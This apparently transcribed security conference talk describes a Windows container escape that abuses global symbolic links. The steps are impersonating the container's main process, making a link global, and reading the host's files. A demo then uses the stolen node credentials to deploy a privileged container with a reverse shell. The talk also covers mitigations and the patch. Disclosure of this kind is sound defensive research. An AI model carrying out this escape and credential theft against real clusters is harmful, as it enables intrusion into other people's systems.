 So, hello everyone, welcome and thank you for joining. You are about to hear a story about how a single missing condition in if statement enabled one of the easiest container escape of recent use. So let's just get started. Okay, so who am I? My name is Daniel Frismont and I'm a Senior Security Researcher of the Palo Alto Networks. I usually do reverse engineering in Windows platform for years. I joined the containers focused team that mostly did like open source vulnerability research on cloud products. Our team are full of security research focused on finding vulnerabilities on the cloud. And I was the only Windows guy in the team. So I decided to focus on Windows containers. Okay, so I'll go over the agenda real quick. We will start things off with the demo to show you guys the impact of this issue. I will then cover containers in general and Windows containers in particular. I will also go over some of the fundamentals that one needs to know in order to fully understand the issue I'll be covering. I will cover the issue itself, what made it possible. And after that we will cover how cloud providers are affected by this issue. And lastly, we'll briefly talk about malware that took advantage of this issue to gain some free processing power. And when we're finished, I will try answering some of the questions you might have. Okay, let's get started with the demo. I will try to explain it while it runs. Okay, so first of all, I'm deploying a Kubernetes YAML. I took this YAML from the Kubernetes official website. I didn't change anything. The only thing I'm doing here is applying a deployment when stating that they know that I'm choosing these windows and not Linux. So it created two deployments for me. And then checking that they're actually running. And at this point I'm executing into the container. I will explain more in the next slide. For now I'm mimicking an attacker actually gaining execution inside the container. So as you can see, I'm inside the windows container. I moved to C and I'm making a directory for all my files for the breakout. I prepared them beforehand. I will explain more in the rest of the talk. Downloading all the tools I created to make breakout. Basically it's a DLL which carries the logic itself and injector which inject the DLL into one of the containers processes. As you can see, I used the injector. It injected itself into the main container process. And I also made log file, which will log what happened from inside that process. I created a symbolic link to the host. How it may, how it possible I will explain later. And for now I'm only doing a simple copy file from the host using the symbolic link I created. And then copying a file from the host to the containers. I will have access to it from inside our container. The file I'm copying is the config file of the node. It's the config file that the node uses in order to talk with the API master server of Kubernetes. As you can see, it contains all the certificates and keys that the nodes have. And I'm going to use this config to impersonate the node in front of the Kubernetes master API server. As you can see, I'm pointing that I want to use a cube config and the default config. And I can actually query the API master server and get information. For example, I see all the running pods as I did from outside the container. And I have a YAML here for a Linux container which opens a reverse shell. Also, this container is privileged. And my goal here is to create a new container, privileged one, a Linux one. So Kubernetes will create this container inside a Linux machine and not Windows, because I already have access to the Windows machine. I won't access to a Linux machine too. So I'm creating a deployment using the config file I stole from the node. And I created a new privileged container. That container contains a reverse shell. So I'm going to connect to that shell for my Windows machine using Netcat. As you can see, I'm inside the Linux, the privileged Linux container. And I have full access to the node too, to the Linux node, because the container is privileged. And at this point in this cluster, I had only two nodes. I had a Linux node and I had a Windows node. I used the Windows node to break out and create a privileged container. So I had access to both the Windows using the vulnerability and Linux using the config file. Okay, but let's explain the demo a bit more. What does it all mean? Okay, so I won't go over the demo step by step because I didn't explain the issue yet. But nevertheless, let's go over the main idea here. So I created a new deployment and note I specifically stated in the YAML that I want a Windows node. I used the example YAML from Kubernetes website with default configuration of the cluster. If you Google how to create Windows container in Kubernetes, that's what we'll find. And I didn't change anything. Remember that because it is important for later. So I created the deployment and issued an exec command into it. This part might confuse you. I used the exec command to mimic an attacker gaining execution into the cluster. So for example, if your cluster hosts a web server with a vulnerability and an attacker managed to use this vulnerability to gain access to your cluster, we will end up in the same step here because the attacker will gain execution and I just use exec. I skip the part when we're going to find a vulnerability in your container and get execution to the container. After that, I use some symbolic tricks to gain access to the host file system. And in this case, the host is the Kubernetes node. Okay, once I gained access to the nodes file system, I use the node Kubernetes config file to impersonate the node to the master API server. In order to create a privileged Linux container. Because I created the Linux container, the API server creates this container on a Linux node. My container packed a reverse shell and once it was up, I simply connected to the shell gaining access to the Linux node as well. And at this point, I had full access to both the Linux and the Windows part of the cluster. And I could do with the cluster anything I wanted. I could create new deployments to mine my cryptocurrency or I could steal all the data in the data cluster or anything else. The possibilities from here are endless. Okay, so what are containers? And I know this is the cloud event and most people here probably know what the container is, but I will go over it quickly just in case. The container is basically an operating system based virtual machine, meaning it runs inside operating system with the same kernel as the operating system. It uses operating system features to isolate the virtual machine from the rest of the system. And like actual virtual machines, which use a completely separate separated operating system and based on hardware, they base their virtualization hardware instead of software. And containers can run anything but the desired container must match the operating system version. So for example, you won't be able to run a Windows containers on the Linux machine. As you saw in the demo, I had to create a Windows node in order to run Windows containers. And one of the most important features of container is that they pack all the necessary files to run the application. So for instance, if you have a special application with special dependencies, you can pack it all in a lightweight container and send it to the end user. Okay, so let's go over the differences. What is the difference between a container and virtual machines real quick? The main difference is that containers rely on the operating system to make it its isolation while virtual machines rely on hardware. So virtual machines virtualize everything including the kernel, while containers run on the same kernel as the host. And because of that, containers are much more portable and efficient. The container image can be as small as a few kilobytes, while virtual machine image will usually be at least a few gigabytes in size, because they have to pack the kernel too. All of that come with a price, of course. Containers are much less secure than a virtual machine. If you look, if you look in Google for container escape, you will probably find much more results than virtual machine escapes. Okay, so on the left side, you can see a virtual machine infrastructure with a hypervisor managing all the machines. Each machine has a separate operating system. And on the right is an infrastructure of a Docker machine, hosting a few different applications. In containers, each application is inside a separate container, but they are all running on the same host operating system with the same kernel. Okay, so what needs to be contained? Let's dive a bit deeper into the internals. And note we are only talking about Linux for now. We'll talk about Linux later. Well, obviously you would want to limit the containers access to resources such as CPU, RAM, network bandwidth, disk bandwidth and such. This is done using a feature called C-groups. And this feature allows us to limit resource usage for a group of processors. Obviously, you wouldn't want your container to get all the CPU or all the disk from your host, so you can limit it. But you would also want to limit the visibility the containers have. If we would only limit resources, nothing would stop a malicious container from just changing its own resource limitation. And for that, we would also want to limit the containers visibility to some of the host objects, such as processors, network interfaces, users, mounts, such things like that. And this is done using a feature called namespace. All of that is in Linux. But this is a talk about Windows containers. So let's move forward to Windows. In order to get a good solution for containers and Windows, the same requirements I talked about in the last slide need to be implemented here. And luckily, Windows had a solution for that resource limitation for years. It's called job objects and they do pretty much the same thing as C-groups in Linux. So there is nothing too interesting about them, but it is important to know that the feature existed for years. It's not new. And it's like the Windows version of C-groups. Okay, but what about visibility isolation? And until recently, Windows didn't actually have a solution for this, and that's why Windows containers didn't exist until like a few years ago. But luckily, a few years ago, Microsoft came up with a feature called server silo, which directly provides the missing features that were necessary in order to create a container solution. And server silos provide everything that namespaces provide in Linux. They isolate the object manager, the registry, networking devices, and basically any named object that process can access. And remember the named object part, that's the important thing. But also here, the other type of Windows containers, the Hyper-V containers and server silo. On the right, you can see how a Hyper-V container architecture looks. It's much different than a regular virtual machine actually. Each container has its own lightweight kernel. Basically, it's the Microsoft version of VM. It's not what we are here to talk about today because it's a VM. And on the left side, you can see the more traditional meaning of the containers. One kernel with few containers for different applications. Note the system processes are also shared with the container. And this is done using server silos. As you can see, all the containers are using the same kernel system, the same system processes. Okay, there is one more thing that need to know before understanding how it all works. It's called root directory object, which is a key feature in Windows operating system without anything to do with containers. Now, without getting too deep about this mechanism, it's suffice to say that all application visible named objects, such as file, registry, events, mutex, RPCs, stuff like that. Anything that is named are hosted in a root namespace, which allows applications to create, locate, share these objects among themselves. Take a look at this screenshot from the WinObject application by SysInternals. It shows the root directory object perfectly. As you can see on the left, there are many directories under the root object, and under global question mark, question mark, there are tons of symbolic links, including the C-letter symbolic link. So yeah, when you are accessing the C drive in your Windows machine, it is in fact a symbolic link to the actual device. There are many more symbolic links over there, but the one most relevant to us is in the ceiling, which points to the actual file system device, which in this case is hardest volume three. In this screenshot, you can see the root directory object of a host. It's not a root directory object of a container or a server silo, it's the root directory object of the host. Now note it can also be a virtual machine, but it has its own kernel. So this screenshot is from a machine with its own kernel and not a container. Okay. And this screenshot, however, you can see what a container looks like in the root directory object. Notice on the left, there is a silo directory. Every server silo container will have its own sub directory under this directory. With the name being the server silo ID. So in this particular case, I had a single container with a silo ID of 804. And as you can see, the silo directory is almost identical to the host directory. This is because Windows tries to virtualize a mini operating system as accurately as possible. So most of the symbolic links that the host have the container have to with different destinations, of course, because we don't want the container to point to the same devices as the host. We will discuss the server silo root directory object further later in the talk. So let's move over to an actual example of how a root directory object is used in a simple create file code. The create file API receives the file's path and returns a handle to the file. The process can read, write, or do basically any action with the handle depending on the permissions the process asks when calling the create file function. In this example, we are calling a create file on a file in the C drive named secret.txt. As I said earlier, note that the C part is just a symbolic link. As you can see in the screenshot below, you can see the C, it pointing to device hardest poetry. Okay. So C is first converted to something that kernel can actually query. This converted to the root directory object form of this path. This is done in user mode before the call arrives to the kernel. And after that in the kernel, the kernel query the global seed path in the root directory object and receive the destination of that symbolic link. We then query that destination to receive from the symbolic link still under the root directory object. But this time the parsing ends with an actual device. Okay. So at this point, having an actual device, the kernel follows the request to the device driver, which in this case is the file system driver. And from here, the file system driver takes the execution and that part is less important for us because we're not here to talk about the file system driver. And remember that part where the kernel received the symbolic link target and query that under the root directory object to until it found an actual device. It will be important for us later. I also remember that this query was an example of the query from the host and not from inside the container. It is slightly different when the calls come from inside the container will cover it in a minute. Okay, so before giving you an example of a file access from inside the container, let's discuss how the system decides that the call comes from inside the container actually. See on the left, it's a screenshot from Ida, where I said for the keyword silo or server silo. There are plenty of functions that can decide if a call comes from a server silo or not. And the kernel uses different functions in different scenarios. This screenshot is from the enters kernel binary. So it's like the binary that represent the kernel window. In our specific case, the kernel decides the call come from a container if it is decided. It's crazy that the path we saw before the global C path relative to the server silo sub directory inside the root directory object. And this will happen to every access of a named object such as files. So every access of a named object from inside server silo, meaning inside a container will be queried relative to the silo's directory and then the silo's ID in this case 804. In this screenshot for Ida, you can see the branch in the kernel where it is decided if path will be queried to the actual root directory object and not to the server silo sub directory in the root directory object. And as you can see, this is done using ps get permanent silo context, kernel function with just returns the context of silo. Okay, let's go over an example of accessing a file from a container. As before, we are accessing a file named secret text under the C drive so exactly before, but this time from inside a container. I'm skipping the user mode part where the API adds the global part before the silo and jumping straight to the kernel part because we already covered that. So the kernel calls ps get permanent silo context as you saw. And it is a silo context and not not if you consider it was not as you signed the last picture that will be queried towards the root directory, the real one of the horse and not the silo. So it takes the branch of a server silo in the kernel code. And it query the relevant directory under the sub directory of the silo in the root directory until it finds the C symbol and link. Okay, but this time the system volume link points to a virtual hard disk device under the silo sub directory in the root directory object note the VHD before before in the name under the device before it was just hardest volume change this in this case it's VHD which represent the virtual hard disk. Okay, but take a look at the screenshot. And this is the interesting part. That virtual hard disk device isn't a device at all. It is a symbolic link to which points to itself, a symbolic link, and we end up in an infinite loop because we have a symbolic link that points to itself in the same name, which is to a symbolic link. And this was the point at my research when I realized there is something I'm missing, because the request to the file was successful, and I was able to read and write to the file in my container. So it was obviously working but on the other hand it looked like we should have a stock in an infinite loop. So what's going on here. So, let's go over what the requirement is in this case. Every container, and of course it relevant to what I just said about the infinite symbol. Every container either in Linux or in Windows needs to be able to communicate with some of the hosts devices. It can be a screen to show output or a network device or the file system. So in the way Windows works, some of the symbolic links under the server side of sub directory must point to a device in the host would directly out. Otherwise the container won't have any access to anything for example the virtual file system is eventually just a path in the host file system. And the container must have access to that path, at least so it must have access to the host file system device. And we're getting closer to the actual state, I promise. The way it is done in Windows is that processes with the right permissions can set a symbolic link as a global. A global symbolic link will always be looked at relative to the host would directly object regardless of the process that is trying to parse it is inside a container. So when the container is created docker set some of the containers symbolic links as global. And that's why the container can maintain some sort of communication with the host. It, it passes global symbolic links. And the result is devices on the host. And note that non global symbolic links like regular symbolic links are passed straight to the side of the object as we discussed earlier. Okay, so in this screenshot again from either. You can clearly see the condition. Yeah, it's called one of the symbolic links parameters. The one that holds the symbolic link if it is global or not. And if it is the execution will take the right branch and we'll retrieve the root direct to the object from a global variable in the kernel. And if not, it will take the left branch and then we will have to get the silo context first. As you can see, the left branch calls peers get permanent silo context. So if the symbolic link is global, the link will be passed from here. Instead of from here. Just, just a visualization of that. Okay, let's move, let's move to the house. How can we exploit that global symbolic link feature to break out of the container. So the function that is in charge of making symbolic links global is the undocumented empty set information symbolic link function. And after a verse in it in order to understand what parameter that function expects. I discovered that it requires s e t c d privilege permissions in order to make the link global. And sadly, the regular container user doesn't have those permissions. So if you are, for example, hosting, you're hosting a web server and someone managed to to abuse their vulnerability need and getting container and gain execution inside your container. That process that web server process in the context they attack a running in will won't have that tcb privilege to create a global symbolic link. Okay, but lucky for us there is another process in the container scope, meaning it is visible to the containers user even without tcb tcb privileges called cx service dot exit. So it is the main process of the container. It's the process that spawns all the other processes. And this process has, in fact, a ctcb privilege. And lucky for us again, by default, the normal container user is administrator. So if you are running a web server, I'm coming back to the web server example, if you're running a web server, the web server is running as administrator by default. So let's look at this screenshot from either. And as you can see, there is a check for a ctcb privilege before moving forward with the execution in making a symbolic in global. And that screenshot is from the anti set information symbolic link function that I mentioned earlier. So let's go over the step plan. To impersonate cx service to gain tcb privileges. There are numerous ways to do that, such as thread impersonation or the LL injection, there are probably many other ways that didn't mention or did it research. But in the demo, I used the LL injection. It didn't return from there in the last year when I research it further, I moved to a thread impersonation. And there are probably many other ways. So after that, we create a regular symbolic link, which at this point is not global and points to our local containerized C drive. Then we call anti set information symbolic link with our newly created symbolic links to make it global and remember that we do that after we already impersonate the cx service. So at this point we have full access to the host C drive by using our local x drive because we created a symbolic link xc and make it global. So now it points to the host. And we are done here and the possibilities are endless. This point we have full access to the host file system. As you saw in the demo, I was able to copy the config file of the node, which is not inside a container. It's inside a home. It's inside the node. And I'm only talking here about the file system, but this can be used for the registry itself. And basically any main object that the file system was just the easiest to exploit and demonstrate. Okay, but how cloud providers are affected by this? Well, the trivial thing is any Kubernetes cluster with a Windows node and attack that gains access to the container can just break out of the host and possibly spread from there, exactly as I did in demo. So it depends on the cluster, how the cluster is configured. But said attacker will at least be able to control every container that the specific node is compromised. Even if the Kubernetes cluster is configured well and unlike in my demo, one node can't access other nodes. The attacker will at least have access to that node with all the containers this node hosts. Okay, so as I demonstrated in my demo, an attacker could possibly spread in the rest of the cluster as well. So not just his node, but other node as well. And another possibility in the whole container as a service that's going on lately, imagine a cloud provider offering Windows containers as a service and not part of an entire cluster. An attacker can host a malicious container and break out of his own container and gain access to other customers private containers because they are running on the same host because the cloud provider won't create a new host with a new kernel for each customer. So that's a possibility. I didn't check it yet. I didn't exploit it, but this can happen. Okay, let's move to an actual example of how this vulnerability could be used in the wild by attackers. So, a few months ago, I discovered Psylskate, which is a malware that was using this vulnerability to gain access to your Kubernetes cluster. It targeted Windows containers specifically in the execution if it detected that the container or the host isn't a Windows container, it just exited. And he used this exactly global symbolic link issue to spread in the rest of the Kubernetes cluster. It basically opened the backdoor to its CNC and just waited for command. And as part of my research, I actually discovered it had active victims, each one being a Kubernetes cluster with the possibility of a huge amount of processing power. I didn't have any way to actually check. Hi, Daniel. Just jumping in here, you have five minutes left and I actually have a question for you if you'd like to answer it. I'm about to finish. Just a moment. Okay, no problem. Okay, so as I was saying, the amount of processing power that the Kubernetes clusters had is unknown. It could be huge clusters with huge amount of processors. Okay, but what can you do about it? Well, there are a few things. First of all, in order for an attacker to even being a position to use this issue, it first needs to gain access to your container. And most of the time this happens to an outdated application in your containers or a missed configured container manager. So keep your applications up to date even if they're inside a container. This is relevant to both Linux and Windows actually. And next, this is only relevant to Windows. I advise you to run your container as a container user instead of administrator if it would be much harder to pull off something without administrator permissions. And Kubernetes supports that as well. There is a special variable you can set in your VML to run your applications as a container user, even in Kubernetes. And third, update your Windows host. This is mostly relevant if you are running your cloud environment on your own. And if you are using one of the cloud providers, they usually keep the host updated. And last but not least, configure Kubernetes properly. For example, there is no reason the nodes user will be a cluster administrator like in my demo. Nodes shouldn't be able to create deployments on other nodes. And real quick, because we are running out of time, a few weeks ago, Microsoft actually patched this anti-symbolic, anti-send information symbolic link function. And the patch is extremely easy to understand and spread forward. As you can see, any call to anti-send information symbolic link from a thread inside a container will be blocked with status privilege not held error. And this is done using the PSC's current thread server silo function, which, as its name suggests, checks whether the current thread is associated with the process inside a server silo. On the right, you can see how the function looks after the patch. There is simply a call and there is a branch there which checks if the calls come from the server silo. So what's next? I will probably start with checking Microsoft's patch, maybe the function to use, maybe PSC's current thread in server silo is broken, and I can still break out. I will probably also look for other ways to abuse symbolic links to break out of the container. And we'll also search for other access points to the host that are not specifically related to symbolic links. And okay, let's go on with the questions.